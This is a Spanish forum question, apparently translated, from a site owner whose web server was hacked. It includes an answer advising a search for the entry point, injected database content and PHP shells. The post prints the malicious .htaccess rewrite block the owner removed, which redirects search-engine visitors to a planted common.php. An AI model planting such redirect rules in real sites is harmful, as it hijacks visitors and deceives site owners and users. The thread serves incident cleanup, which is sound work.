Posible duplicado:
Mi servidor ha sido hackeado EMERGENCIA
Mi sitio web fue pirateado recientemente. Creo que encontré el código que se agregó al archivo htaccess, lo eliminé y luego agregué un script para evitar que se acceda nuevamente al archivo htaccess. También eliminé el archivo php al que hace referencia el código pirateado (common.php). ¿Qué necesito hacer a continuación? No soy programador ni desarrollador de sitios web, pero realmente quería ver si podía solucionar el problema yo mismo, ya que pasé bastantes horas intentándolo y no me rindo fácilmente.
Aquí está el código pirateado que eliminé:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|phtml|asp|aspx)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond /home/httpd/vhosts/bluestardive.com/httpdocs/common.php -f
RewriteRule ^.*$ /common.php [L]
</IfModule>
Este código tiene que permanecer en el archivo htaccess ya que redirige mi URL a otras compatibles con SEO o a los errores del sitio web, pero ¿este código también ha sido pirateado?
# Apache search queries statistic module
RewriteEngine On
AddHandler php5-fastcgi .php .php5
# <contrexx>
# <core_modules__alias>
RewriteRule ^about-us$ /index.php?page=883 [L,NC]
RewriteRule ^ausfluge-und-aktivitaten$ /index.php?page=800 [L,NC]
RewriteRule ^bluestardive-news$ /index.php?page=919 [L,NC]
RewriteRule ^bookings$ /index.php?page=911 [L,NC]
RewriteRule ^diveresort$ /index.php?page=879 [L,NC]
RewriteRule ^diving$ /index.php?page=880 [L,NC]
RewriteRule ^excursions-and-activities$ /index.php?page=881 [L,NC]
RewriteRule ^galerie$ /index.php?section=gallery [L,NC]
RewriteRule ^oceannight$ http://www.bluestardive.com/index.php?page=906 [L,NC]
RewriteRule ^philosophy$ /index.php?page=846 [L,NC]
RewriteRule ^reservation$ /index.php?page=917 [L,NC]
RewriteRule ^reservierung$ /index.php?page=918 [L,NC]
RewriteRule ^resort$ /index.php?page=798 [L,NC]
# </core_modules__alias>
# </contrexx>
Respuesta1
Lo mejor que se puede hacer en situaciones como estas es identificar el punto de entrada de los usuarios y duplicar el ataque. No puedo decirle si se agregó algo sospechoso al .htaccess ya que no tengo idea de lo que hay dentro de index.php.
Si los datos de index.php se hacen eco directamente de la base de datos, entonces es posible que haya agregado código malicioso dentro de la base de datos, posiblemente haya creado algunos puntos de entrada nuevos (PHP Shells, Vulns) en otros archivos.
Le recomiendo encarecidamente que hable con un profesional de seguridad; de lo contrario, vuelva a inspeccionar minuciosamente todos los archivos de su servidor, incluidas las entradas de la base de datos.
Asegúrate también de averiguar cuál fue su punto de entrada para evitar futuros ataques. Si necesitas más información, siempre puedes contactarme.